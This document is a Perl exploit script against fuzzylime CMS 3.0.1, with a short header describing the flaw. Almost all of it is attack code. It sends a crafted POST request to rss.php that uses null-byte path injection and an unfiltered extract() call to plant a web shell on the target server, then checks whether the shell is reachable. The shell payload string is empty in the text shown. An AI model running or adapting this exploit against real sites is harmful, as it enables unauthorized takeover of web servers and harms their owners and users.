#!/usr/bin/perl # # fuzzylime 3.0.1 Perl exploit # # discovered & written by Ams # ax330d@gmail.com # # DESCRIPTION: # There are availability to load files through script # rss.php, and also there are unfiltered extract(); usage. # This exploit creates shell in /code/counter/middle_index_inc.php # # USAGE: # Run exploit: perl expl.pl http://www.site.com # # NEEDED: # magic_quotes_gpc=off # use strict; use IO::Socket; print "\n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \n\t\t fuzzlyime 3.0.1 exploit \n\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n"; if(@ARGV<1){ die "\n\tUsage:\texpl.pl url\n\n \n\tExample:\texpl.pl http://localhost/path/\n\n"; } my $expl_url=$ARGV[0]; my $shell=q~ ~; my $shell_name='middle_index.inc.php'; print "\tStarting exploit...\n"; if($expl_url=~m#http://#){ exploit($expl_url); } else { exploit('http://'.$expl_url); } sub exploit { # Defining... my $site=pop @_; (my $a,my $b,my $c,my @d)=split /\//,$site; my $path=join('/',@d); my $host=$c; if($path) {$path='/'.$path;} my $injection="p=../code/content.php%00&s=$shell_name%00&curcount=$shell"; my $length=length($injection); # Injecting... my $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket){ die("\n\tUnable to connect to http://$host\n\n"); } else { my $packet = "POST $path/rss.php HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: $length\r\n\r\n"; $packet .= "$injection"; print $socket $packet; close($socket); } sleep(1); # Checking for shell... $socket=IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$host, PeerPort=>"80" ); if( ! $socket){ die("\n\tUnable to connect to http://$host (check shell yourself)\n\n"); } else { my $packet = "POST $path/code/counter/$shell_name HTTP/1.1\r\n"; $packet .= "Host: $host\r\n"; $packet .= "Connection: Close\r\n\r\n"; print $socket $packet; my $rcv; my $dat=''; while($rcv=<$socket>){ $dat.=$rcv; } if ($dat =~ /200 OK/){ print "\n\t$site\t[OK]\n\n"; } else { print "\n\t$site\t[FAIL]\n\n"; } close($socket); } }